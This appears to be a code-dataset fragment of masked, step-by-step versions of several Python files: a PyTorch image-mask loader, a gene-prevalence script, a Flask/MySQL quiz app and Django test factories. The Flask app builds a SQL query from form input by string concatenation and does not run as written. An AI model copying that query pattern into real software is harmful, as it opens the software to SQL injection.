"step-3": "<mask token>\n\n\nclass Datalayer(BaseDataLayer):\n\n def __init__(self, config, augmentation=None, preprocessing=None):\n super(Datalayer, self).__init__()\n self.config = config\n train_dir = self.config['Dataset']['TrainPath']\n bg_imgs_dir = os.path.join(train_dir, 'bg')\n mask_suffix = '_mask.png'\n img_suffix = '.png'\n self.bg_masks_path = [os.path.join(bg_imgs_dir, bg_mask_name) for\n bg_mask_name in os.listdir(bg_imgs_dir) if bg_mask_name.\n endswith(mask_suffix)]\n self.bg_imgs_path = [bg_mask_path.replace(mask_suffix, img_suffix) for\n bg_mask_path in self.bg_masks_path]\n ng_imgs_dir = os.path.join(train_dir, 'ng')\n self.ng_masks_path = [os.path.join(ng_imgs_dir, ng_img_name) for\n ng_img_name in os.listdir(ng_imgs_dir) if ng_img_name.endswith(\n mask_suffix)]\n self.ng_imgs_path = [ng_mask_path.replace(mask_suffix, img_suffix) for\n ng_mask_path in self.ng_masks_path]\n self.augmentation = augmentation\n self.preprocessing = preprocessing\n\n def __len__(self):\n return len(self.bg_masks_path) + len(self.ng_masks_path)\n\n def __getitem__(self, item):\n if np.random.random() > 0.5 and len(self.bg_masks_path) > 0:\n random_id_bg = np.random.randint(0, len(self.bg_imgs_path))\n img_path, mask_path = self.bg_imgs_path[random_id_bg\n ], self.bg_masks_path[random_id_bg]\n else:\n random_id_ng = np.random.randint(0, len(self.ng_imgs_path))\n img_path, mask_path = self.ng_imgs_path[random_id_ng\n ], self.ng_masks_path[random_id_ng]\n img = cv2.imread(img_path)\n mask = cv2.imread(mask_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n if self.augmentation:\n sample = self.augmentation(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n if self.preprocessing:\n sample = self.preprocessing(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n return img, mask\n",
"step-4": "import os\nimport cv2\nimport numpy as np\nimport torch\nimport torch.utils.data\nimport torchvision\nfrom torchvision import transforms\nfrom utils.utils import loadYaml\nfrom .base_datalayer import BaseDataLayer\nimport albumentations as albu\n\n\nclass Datalayer(BaseDataLayer):\n\n def __init__(self, config, augmentation=None, preprocessing=None):\n super(Datalayer, self).__init__()\n self.config = config\n train_dir = self.config['Dataset']['TrainPath']\n bg_imgs_dir = os.path.join(train_dir, 'bg')\n mask_suffix = '_mask.png'\n img_suffix = '.png'\n self.bg_masks_path = [os.path.join(bg_imgs_dir, bg_mask_name) for\n bg_mask_name in os.listdir(bg_imgs_dir) if bg_mask_name.\n endswith(mask_suffix)]\n self.bg_imgs_path = [bg_mask_path.replace(mask_suffix, img_suffix) for\n bg_mask_path in self.bg_masks_path]\n ng_imgs_dir = os.path.join(train_dir, 'ng')\n self.ng_masks_path = [os.path.join(ng_imgs_dir, ng_img_name) for\n ng_img_name in os.listdir(ng_imgs_dir) if ng_img_name.endswith(\n mask_suffix)]\n self.ng_imgs_path = [ng_mask_path.replace(mask_suffix, img_suffix) for\n ng_mask_path in self.ng_masks_path]\n self.augmentation = augmentation\n self.preprocessing = preprocessing\n\n def __len__(self):\n return len(self.bg_masks_path) + len(self.ng_masks_path)\n\n def __getitem__(self, item):\n if np.random.random() > 0.5 and len(self.bg_masks_path) > 0:\n random_id_bg = np.random.randint(0, len(self.bg_imgs_path))\n img_path, mask_path = self.bg_imgs_path[random_id_bg\n ], self.bg_masks_path[random_id_bg]\n else:\n random_id_ng = np.random.randint(0, len(self.ng_imgs_path))\n img_path, mask_path = self.ng_imgs_path[random_id_ng\n ], self.ng_masks_path[random_id_ng]\n img = cv2.imread(img_path)\n mask = cv2.imread(mask_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n if self.augmentation:\n sample = self.augmentation(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n if self.preprocessing:\n sample = self.preprocessing(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n return img, mask\n",
"step-5": "import os\nimport cv2\nimport numpy as np\nimport torch\nimport torch.utils.data\nimport torchvision\nfrom torchvision import transforms\nfrom utils.utils import loadYaml\nfrom .base_datalayer import BaseDataLayer\nimport albumentations as albu\n\n\nclass Datalayer(BaseDataLayer):\n\n def __init__(self, config, augmentation=None, preprocessing=None):\n super(Datalayer, self).__init__()\n self.config = config\n train_dir = self.config['Dataset']['TrainPath']\n\n bg_imgs_dir = os.path.join(train_dir, 'bg')\n\n mask_suffix = '_mask.png'\n img_suffix = '.png'\n self.bg_masks_path = [os.path.join(bg_imgs_dir, bg_mask_name) for bg_mask_name in os.listdir(bg_imgs_dir) if\n bg_mask_name.endswith(mask_suffix)]\n self.bg_imgs_path = [bg_mask_path.replace(mask_suffix, img_suffix) for bg_mask_path in self.bg_masks_path]\n\n ng_imgs_dir = os.path.join(train_dir, 'ng')\n self.ng_masks_path = [os.path.join(ng_imgs_dir, ng_img_name) for ng_img_name in os.listdir(ng_imgs_dir) if\n ng_img_name.endswith(mask_suffix)]\n self.ng_imgs_path = [ng_mask_path.replace(mask_suffix, img_suffix) for ng_mask_path in self.ng_masks_path]\n\n self.augmentation = augmentation\n self.preprocessing = preprocessing\n\n def __len__(self):\n return len(self.bg_masks_path) + len(self.ng_masks_path)\n\n def __getitem__(self, item):\n # bg\n if np.random.random() > 0.5 and len(self.bg_masks_path) > 0:\n random_id_bg = np.random.randint(0, len(self.bg_imgs_path))\n img_path, mask_path = self.bg_imgs_path[random_id_bg], self.bg_masks_path[random_id_bg]\n # ng\n else:\n random_id_ng = np.random.randint(0, len(self.ng_imgs_path))\n img_path, mask_path = self.ng_imgs_path[random_id_ng], self.ng_masks_path[random_id_ng]\n\n img = cv2.imread(img_path)\n mask = cv2.imread(mask_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n # apply augmentations\n if self.augmentation:\n sample = self.augmentation(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n # apply preprocessing\n if self.preprocessing:\n sample = self.preprocessing(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n return img, mask\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
from collections import Counter, defaultdict
import pandas as pd
from glob import glob
import subsamplex
files = glob('outputs.txt/*.unique.txt.gz')
files.sort()
biome = pd.read_table('cold/biome.txt', squeeze=True, index_col=0)
duplicates = set(line.strip() for line in open('cold/duplicates.txt'))
counts = defaultdict(Counter)
skipped = 0
for i,fname in enumerate(files):
sample = fname.split('/')[1].split('.')[0]
if sample in duplicates:
skipped += 1
if skipped % 100 == 99:
print(f'Skip {skipped}')
continue
f = pd.read_table(fname, index_col=0, squeeze=True)
if f.sum() < 1_000_000:
skipped += 1
if skipped % 100 == 99:
print(f'Skip {skipped}')
continue
f.values.flat[:] = subsamplex.subsample(f.values.ravel(), 1000*1000)
f = f[f>0]
counts[biome[sample]].update(f.index)
if i % 100 == 99:
print("Done {}/{}".format(i+1, len(files)))
recounts = pd.DataFrame({k:pd.Series(v) for k, v in counts.items()})
recounts.fillna(0, inplace=True)
used_total = recounts.sum(1)
recounts['all'] = used_total
recounts = recounts.astype(int)
recounts.reset_index(inplace=True)
recounts.to_feather('tables/genes.1m.unique.prevalence.no-dups.feather')
names = [line.strip() for line in open('cold/derived/GMGC10.headers')]
recounts.set_index('index', inplace=True)
recounts.index = recounts.index.map(names.__getitem__)
recounts.to_csv('tables/genes.1m.unique.no-dups.prevalence.txt', sep='\t')
|
normal
|
{
"blob_id": "74eea67b8640a03e616bebdadba49891017b921d",
"index": 8914,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfiles.sort()\n<mask token>\nfor i, fname in enumerate(files):\n sample = fname.split('/')[1].split('.')[0]\n if sample in duplicates:\n skipped += 1\n if skipped % 100 == 99:\n print(f'Skip {skipped}')\n continue\n f = pd.read_table(fname, index_col=0, squeeze=True)\n if f.sum() < 1000000:\n skipped += 1\n if skipped % 100 == 99:\n print(f'Skip {skipped}')\n continue\n f.values.flat[:] = subsamplex.subsample(f.values.ravel(), 1000 * 1000)\n f = f[f > 0]\n counts[biome[sample]].update(f.index)\n if i % 100 == 99:\n print('Done {}/{}'.format(i + 1, len(files)))\n<mask token>\nrecounts.fillna(0, inplace=True)\n<mask token>\nrecounts.reset_index(inplace=True)\nrecounts.to_feather('tables/genes.1m.unique.prevalence.no-dups.feather')\n<mask token>\nrecounts.set_index('index', inplace=True)\n<mask token>\nrecounts.to_csv('tables/genes.1m.unique.no-dups.prevalence.txt', sep='\\t')\n",
"step-3": "<mask token>\nfiles = glob('outputs.txt/*.unique.txt.gz')\nfiles.sort()\nbiome = pd.read_table('cold/biome.txt', squeeze=True, index_col=0)\nduplicates = set(line.strip() for line in open('cold/duplicates.txt'))\ncounts = defaultdict(Counter)\nskipped = 0\nfor i, fname in enumerate(files):\n sample = fname.split('/')[1].split('.')[0]\n if sample in duplicates:\n skipped += 1\n if skipped % 100 == 99:\n print(f'Skip {skipped}')\n continue\n f = pd.read_table(fname, index_col=0, squeeze=True)\n if f.sum() < 1000000:\n skipped += 1\n if skipped % 100 == 99:\n print(f'Skip {skipped}')\n continue\n f.values.flat[:] = subsamplex.subsample(f.values.ravel(), 1000 * 1000)\n f = f[f > 0]\n counts[biome[sample]].update(f.index)\n if i % 100 == 99:\n print('Done {}/{}'.format(i + 1, len(files)))\nrecounts = pd.DataFrame({k: pd.Series(v) for k, v in counts.items()})\nrecounts.fillna(0, inplace=True)\nused_total = recounts.sum(1)\nrecounts['all'] = used_total\nrecounts = recounts.astype(int)\nrecounts.reset_index(inplace=True)\nrecounts.to_feather('tables/genes.1m.unique.prevalence.no-dups.feather')\nnames = [line.strip() for line in open('cold/derived/GMGC10.headers')]\nrecounts.set_index('index', inplace=True)\nrecounts.index = recounts.index.map(names.__getitem__)\nrecounts.to_csv('tables/genes.1m.unique.no-dups.prevalence.txt', sep='\\t')\n",
"step-4": "from collections import Counter, defaultdict\nimport pandas as pd\nfrom glob import glob\nimport subsamplex\nfiles = glob('outputs.txt/*.unique.txt.gz')\nfiles.sort()\nbiome = pd.read_table('cold/biome.txt', squeeze=True, index_col=0)\nduplicates = set(line.strip() for line in open('cold/duplicates.txt'))\ncounts = defaultdict(Counter)\nskipped = 0\nfor i, fname in enumerate(files):\n sample = fname.split('/')[1].split('.')[0]\n if sample in duplicates:\n skipped += 1\n if skipped % 100 == 99:\n print(f'Skip {skipped}')\n continue\n f = pd.read_table(fname, index_col=0, squeeze=True)\n if f.sum() < 1000000:\n skipped += 1\n if skipped % 100 == 99:\n print(f'Skip {skipped}')\n continue\n f.values.flat[:] = subsamplex.subsample(f.values.ravel(), 1000 * 1000)\n f = f[f > 0]\n counts[biome[sample]].update(f.index)\n if i % 100 == 99:\n print('Done {}/{}'.format(i + 1, len(files)))\nrecounts = pd.DataFrame({k: pd.Series(v) for k, v in counts.items()})\nrecounts.fillna(0, inplace=True)\nused_total = recounts.sum(1)\nrecounts['all'] = used_total\nrecounts = recounts.astype(int)\nrecounts.reset_index(inplace=True)\nrecounts.to_feather('tables/genes.1m.unique.prevalence.no-dups.feather')\nnames = [line.strip() for line in open('cold/derived/GMGC10.headers')]\nrecounts.set_index('index', inplace=True)\nrecounts.index = recounts.index.map(names.__getitem__)\nrecounts.to_csv('tables/genes.1m.unique.no-dups.prevalence.txt', sep='\\t')\n",
"step-5": "from collections import Counter, defaultdict\nimport pandas as pd\nfrom glob import glob\nimport subsamplex\n\nfiles = glob('outputs.txt/*.unique.txt.gz')\nfiles.sort()\nbiome = pd.read_table('cold/biome.txt', squeeze=True, index_col=0)\nduplicates = set(line.strip() for line in open('cold/duplicates.txt'))\n\ncounts = defaultdict(Counter)\nskipped = 0\nfor i,fname in enumerate(files):\n sample = fname.split('/')[1].split('.')[0]\n if sample in duplicates:\n skipped += 1\n if skipped % 100 == 99:\n print(f'Skip {skipped}')\n continue\n f = pd.read_table(fname, index_col=0, squeeze=True)\n if f.sum() < 1_000_000:\n skipped += 1\n if skipped % 100 == 99:\n print(f'Skip {skipped}')\n continue\n f.values.flat[:] = subsamplex.subsample(f.values.ravel(), 1000*1000)\n f = f[f>0]\n counts[biome[sample]].update(f.index)\n if i % 100 == 99:\n print(\"Done {}/{}\".format(i+1, len(files)))\n\nrecounts = pd.DataFrame({k:pd.Series(v) for k, v in counts.items()})\nrecounts.fillna(0, inplace=True)\nused_total = recounts.sum(1)\nrecounts['all'] = used_total\nrecounts = recounts.astype(int)\nrecounts.reset_index(inplace=True)\nrecounts.to_feather('tables/genes.1m.unique.prevalence.no-dups.feather')\n\nnames = [line.strip() for line in open('cold/derived/GMGC10.headers')]\nrecounts.set_index('index', inplace=True)\nrecounts.index = recounts.index.map(names.__getitem__)\nrecounts.to_csv('tables/genes.1m.unique.no-dups.prevalence.txt', sep='\\t')\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import os
import mysql.connector
import time
from flask import Flask, render_template
app = Flask(__name__)
def dbconnect():
return mysql.connector.connect(user= , password= , host="mysqlshereen.mysql.database.azure.com", port=3306, database='test')
@app.route('/result', methods=['POST', 'GET'])
def query():
start_time = time.time()
display = []
conn=dbconnect()
curr=conn.cursor()
curr.execute("""
UPDATE TABLE SET columnName = null WHERE YourCondition
delete from FOOD where DIGITS >900;""")
sql=curr.fetchall()
for row in sql:
tuple = (row[0], row[1], row[3])
display.append(tuple)
end_time = time.time()
total_time = end_time - start_time
print("final time:", total_time)
display.append(total_time)
curr.close()
conn.close()
return render_template('display.html', display=display)
@app.route('/download', methods=['POST', 'GET'])
def download():
list = []
if request.method == 'POST':
mytext = request.form['text1']
mytext1 = request.form['text2']
conn = dbconnect()
curr = conn.cursor()
r1=int(mytext)
r2 = int(mytext1)
curr.execute('select DIGITS,CATEGORY from food DIGITS ">"' +r1+'DIGITS"<"'+r2)
sql = curr.fetchall()
#curr.execute('select PICTURE from FOOD')
data = curr.fetchone()[0]
for row in data:
with open('/home/shereen/quiz8/static/'+name+'.jpg','w') as local_file:
local_file.write(data)
list.append(data)
#img_name = name+'.jpg'
curr.close()
conn.close()
#return img_name
return render_template('result.html',list=list,)
def insert():
conn = dbconnect()
curr = conn.cursor()
path = '/home/shereen/quiz8/data/'
for root, dirs, files in os.walk('/home/shereen/quiz8/data/'):
for file in files:
img_file = file.replace('csv', 'jpg')
print(img_file)
if file.endswith(".csv"):
with open(path + file) as f:
name = file[:-4]
lines = f.readlines()
line1 = lines[0].replace('\r', '')
line2 = lines[1].replace('\r', '')
line3 = lines[2].replace('\r', '')
with open('/home/shereen/quiz8/data/' + img_file, 'rb') as img:
image = img.read()
sql = 'insert into FOOD (NAME,ingred,digits,category,picture) values (%s,%s,%s,%s,%s)'
args = (name,line2, line1, line3, image)
curr.execute(sql, args)
conn.commit()
def dbcount():
print('hi')
conn = dbconnect()
cur = conn.cursor()
start_time = time.time()
conn = dbconnect()
cur = conn.cursor()
quer = 'select count(*) from FOOD'
cur.execute(quer)
res = cur.fetchone()
print(res[0])
conn.commit()
cur.close()
conn.close()
end_time = time.time()
tot = end_time - start_time
cur.close()
conn.close()
return res
@app.route('/')
def hello_world():
insert()
#query()
img_name = download()
#return render_template('result.html', img_name=img_name)
return render_template('main.html')
if __name__ == '__main__':
app.run()
|
normal
|
{
"blob_id": "3314ffdbc2f10170176c590aebf49c416bcc8856",
"index": 2136,
"step-1": "import os\n\nimport mysql.connector\nimport time\nfrom flask import Flask, render_template\n\napp = Flask(__name__)\n\ndef dbconnect():\n\n return mysql.connector.connect(user= , password= , host=\"mysqlshereen.mysql.database.azure.com\", port=3306, database='test')\n\n@app.route('/result', methods=['POST', 'GET'])\ndef query():\n start_time = time.time()\n display = []\n conn=dbconnect()\n curr=conn.cursor()\n curr.execute(\"\"\"\nUPDATE TABLE SET columnName = null WHERE YourCondition\ndelete from FOOD where DIGITS >900;\"\"\")\n\n sql=curr.fetchall()\n\n for row in sql:\n tuple = (row[0], row[1], row[3])\n display.append(tuple)\n end_time = time.time()\n total_time = end_time - start_time\n print(\"final time:\", total_time)\n display.append(total_time)\n curr.close()\n conn.close()\n return render_template('display.html', display=display)\n\n\n@app.route('/download', methods=['POST', 'GET'])\ndef download():\n list = []\n if request.method == 'POST':\n mytext = request.form['text1']\n mytext1 = request.form['text2']\n conn = dbconnect()\n curr = conn.cursor()\n r1=int(mytext)\n r2 = int(mytext1)\n curr.execute('select DIGITS,CATEGORY from food DIGITS \">\"' +r1+'DIGITS\"<\"'+r2)\n sql = curr.fetchall()\n #curr.execute('select PICTURE from FOOD')\n data = curr.fetchone()[0]\n for row in data:\n with open('/home/shereen/quiz8/static/'+name+'.jpg','w') as local_file:\n local_file.write(data)\n list.append(data)\n #img_name = name+'.jpg'\n\n curr.close()\n conn.close()\n #return img_name\n return render_template('result.html',list=list,)\n\n\ndef insert():\n conn = dbconnect()\n curr = conn.cursor()\n path = '/home/shereen/quiz8/data/'\n\n for root, dirs, files in os.walk('/home/shereen/quiz8/data/'):\n for file in files:\n img_file = file.replace('csv', 'jpg')\n print(img_file)\n if file.endswith(\".csv\"):\n with open(path + file) as f:\n name = file[:-4]\n lines = f.readlines()\n line1 = lines[0].replace('\\r', '')\n line2 = lines[1].replace('\\r', '')\n line3 = lines[2].replace('\\r', '')\n with open('/home/shereen/quiz8/data/' + img_file, 'rb') as img:\n image = img.read()\n sql = 'insert into FOOD (NAME,ingred,digits,category,picture) values (%s,%s,%s,%s,%s)'\n args = (name,line2, line1, line3, image)\n curr.execute(sql, args)\n conn.commit()\n\ndef dbcount():\n print('hi')\n conn = dbconnect()\n cur = conn.cursor()\n start_time = time.time()\n conn = dbconnect()\n cur = conn.cursor()\n quer = 'select count(*) from FOOD'\n cur.execute(quer)\n res = cur.fetchone()\n print(res[0])\n conn.commit()\n cur.close()\n conn.close()\n end_time = time.time()\n tot = end_time - start_time\n cur.close()\n conn.close()\n return res\n\n@app.route('/')\ndef hello_world():\n insert()\n #query()\n img_name = download()\n #return render_template('result.html', img_name=img_name)\n return render_template('main.html')\n\n\nif __name__ == '__main__':\n app.run()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# -*- coding: utf-8 -*-
from services.interfaces.i_service import IService
from services.dbservices.db_service import DBService
class GetCommunitiesByOffsetService(IService):
def __init__(self, core, parameters):
super(GetCommunitiesByOffsetService, self).__init__(core, parameters)
def run(self):
return DBService(self.core).getNextFields("Communities", self.parameters["start"], self.parameters["offset"])
|
normal
|
{
"blob_id": "051bd11c42815ec8f8ece8eae9d33890da77129c",
"index": 148,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass GetCommunitiesByOffsetService(IService):\n <mask token>\n\n def run(self):\n return DBService(self.core).getNextFields('Communities', self.\n parameters['start'], self.parameters['offset'])\n",
"step-3": "<mask token>\n\n\nclass GetCommunitiesByOffsetService(IService):\n\n def __init__(self, core, parameters):\n super(GetCommunitiesByOffsetService, self).__init__(core, parameters)\n\n def run(self):\n return DBService(self.core).getNextFields('Communities', self.\n parameters['start'], self.parameters['offset'])\n",
"step-4": "from services.interfaces.i_service import IService\nfrom services.dbservices.db_service import DBService\n\n\nclass GetCommunitiesByOffsetService(IService):\n\n def __init__(self, core, parameters):\n super(GetCommunitiesByOffsetService, self).__init__(core, parameters)\n\n def run(self):\n return DBService(self.core).getNextFields('Communities', self.\n parameters['start'], self.parameters['offset'])\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom services.interfaces.i_service import IService\nfrom services.dbservices.db_service import DBService\n\nclass GetCommunitiesByOffsetService(IService):\n def __init__(self, core, parameters):\n super(GetCommunitiesByOffsetService, self).__init__(core, parameters)\n\n def run(self):\n return DBService(self.core).getNextFields(\"Communities\", self.parameters[\"start\"], self.parameters[\"offset\"])\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
# coding: utf-8
import os
import factory
import datetime
from journalmanager import models
from django.contrib.auth.models import Group
from django.core.files.base import File
_HERE = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(_HERE, 'xml_samples', '0034-8910-rsp-48-2-0216.xml')) as xml_file:
SAMPLE_XML = xml_file.read()
SAMPLE_TIFF_IMAGE = open(
os.path.join(_HERE, 'image_test', 'sample_tif_image.tif'))
with open(os.path.join(_HERE, 'xml_samples', '0034-8910-rsp-48-2-0216_related.xml')) as xml_file:
SAMPLE_XML_RELATED = xml_file.read()
class UserFactory(factory.Factory):
FACTORY_FOR = models.User
@classmethod
def _setup_next_sequence(cls):
try:
return cls._associated_class.objects.values_list(
'id', flat=True).order_by('-id')[0] + 1
except IndexError:
return 0
username = factory.Sequence(lambda n: "jmanager_username%s" % n)
first_name = factory.Sequence(lambda n: "jmanager_first_name%s" % n)
last_name = factory.Sequence(lambda n: "jmanager_last_name%s" % n)
email = factory.Sequence(lambda n: "jmanager_email%s@example.com" % n)
password = 'sha1$caffc$30d78063d8f2a5725f60bae2aca64e48804272c3'
is_staff = False
is_active = True
is_superuser = False
last_login = datetime.datetime(2000, 1, 1)
date_joined = datetime.datetime(1999, 1, 1)
class GroupFactory(factory.Factory):
FACTORY_FOR = Group
name = factory.Sequence(lambda n: "Group #%s" % n)
class SubjectCategoryFactory(factory.Factory):
FACTORY_FOR = models.SubjectCategory
term = 'Acoustics'
class StudyAreaFactory(factory.Factory):
FACTORY_FOR = models.StudyArea
study_area = 'Health Sciences'
class SponsorFactory(factory.Factory):
FACTORY_FOR = models.Sponsor
name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'
address = u'Av. Professor Lineu Prestes, 338 Cidade Universitária \
Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'
email = 'fapesp@scielo.org'
complement = ''
class UseLicenseFactory(factory.Factory):
FACTORY_FOR = models.UseLicense
license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)
reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'
disclaimer = u'<a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/"><img alt="Licença Creative Commons" style="border-width:0" src="http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png" /></a><br />Este trabalho foi licenciado com uma Licença <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'
class CollectionFactory(factory.Factory):
FACTORY_FOR = models.Collection
url = u'http://www.scielo.br/'
name = factory.Sequence(lambda n: 'scielo%s' % n)
address_number = u'430'
country = u'Brasil'
address = u'Rua Machado Bittencourt'
email = u'fapesp@scielo.org'
name_slug = factory.Sequence(lambda n: 'scl%s' % n)
class JournalFactory(factory.Factory):
FACTORY_FOR = models.Journal
ctrl_vocabulary = u'decs'
frequency = u'Q'
scielo_issn = u'print'
print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))
eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))
init_vol = u'1'
title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'
title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'
short_title = u'ABCD.(São Paulo)'
editorial_standard = u'vancouv'
secs_code = u'6633'
init_year = u'1986'
acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))
pub_level = u'CT'
init_num = u'1',
subject_descriptors = u"""
MEDICINA
CIRURGIA
GASTROENTEROLOGIA
GASTROENTEROLOGIA""".strip()
publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'
publisher_country = u'BR'
publisher_state = u'SP'
publication_city = u'São Paulo'
editor_address = u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'
editor_email = u'cbcd@cbcd.org.br'
creator = factory.SubFactory(UserFactory)
use_license = factory.SubFactory(UseLicenseFactory)
class SectionFactory(factory.Factory):
FACTORY_FOR = models.Section
code = factory.Sequence(lambda n: 'BJCE%s' % n)
journal = factory.SubFactory(JournalFactory)
class LanguageFactory(factory.Factory):
FACTORY_FOR = models.Language
iso_code = 'pt'
name = 'portuguese'
class IssueTitleFactory(factory.Factory):
"""
``issue`` must be provided
"""
FACTORY_FOR = models.IssueTitle
language = factory.SubFactory(LanguageFactory)
title = u'Bla'
class IssueFactory(factory.Factory):
FACTORY_FOR = models.Issue
total_documents = 16
number = factory.Sequence(lambda n: '%s' % n)
volume = factory.Sequence(lambda n: '%s' % n)
is_trashed = False
publication_start_month = 9
publication_end_month = 11
publication_year = 2012
is_marked_up = False
suppl_text = '1'
journal = factory.SubFactory(JournalFactory)
@classmethod
def _prepare(cls, create, **kwargs):
section = SectionFactory()
issue = super(IssueFactory, cls)._prepare(create, **kwargs)
issue.section.add(section)
return issue
class UserProfileFactory(factory.Factory):
FACTORY_FOR = models.UserProfile
user = factory.SubFactory(UserFactory)
email_notifications = True
class SectionTitleFactory(factory.Factory):
FACTORY_FOR = models.SectionTitle
title = u'Artigos Originais'
language = factory.SubFactory(LanguageFactory)
section = factory.SubFactory(SectionFactory)
class RegularPressReleaseFactory(factory.Factory):
FACTORY_FOR = models.RegularPressRelease
issue = factory.SubFactory(IssueFactory)
doi = factory.Sequence(lambda n: 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)
class AheadPressReleaseFactory(factory.Factory):
FACTORY_FOR = models.AheadPressRelease
journal = factory.SubFactory(JournalFactory)
doi = factory.Sequence(lambda n: 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)
class PressReleaseTranslationFactory(factory.Factory):
FACTORY_FOR = models.PressReleaseTranslation
language = factory.SubFactory(LanguageFactory)
press_release = factory.SubFactory(RegularPressReleaseFactory)
title = u'Yeah, this issue is amazing!'
content = u'Want to read more about...'
class PressReleaseArticleFactory(factory.Factory):
FACTORY_FOR = models.PressReleaseArticle
press_release = factory.SubFactory(RegularPressReleaseFactory)
article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)
class ArticleFactory(factory.Factory):
FACTORY_FOR = models.Article
xml = SAMPLE_XML
is_aop = False
domain_key = factory.Sequence(
lambda n: 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)
journal_title = u'Revista de Saúde Pública'
issn_ppub = u'0034-8910'
issn_epub = u'1518-8787'
xml_version = u'sps-1.2'
article_type = u'research-article'
doi = u'10.1590/S0034-8910.2014048004965'
class ArticleAssetFactory(factory.Factory):
FACTORY_FOR = models.ArticleAsset
article = factory.SubFactory(ArticleFactory)
file = File(SAMPLE_TIFF_IMAGE)
owner = u'SciELO'
use_license = u'Creative Commons - BY'
|
normal
|
{
"blob_id": "44d87f112ab60a202e4c8d64d7aec6f4f0d10578",
"index": 31,
"step-1": "<mask token>\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n",
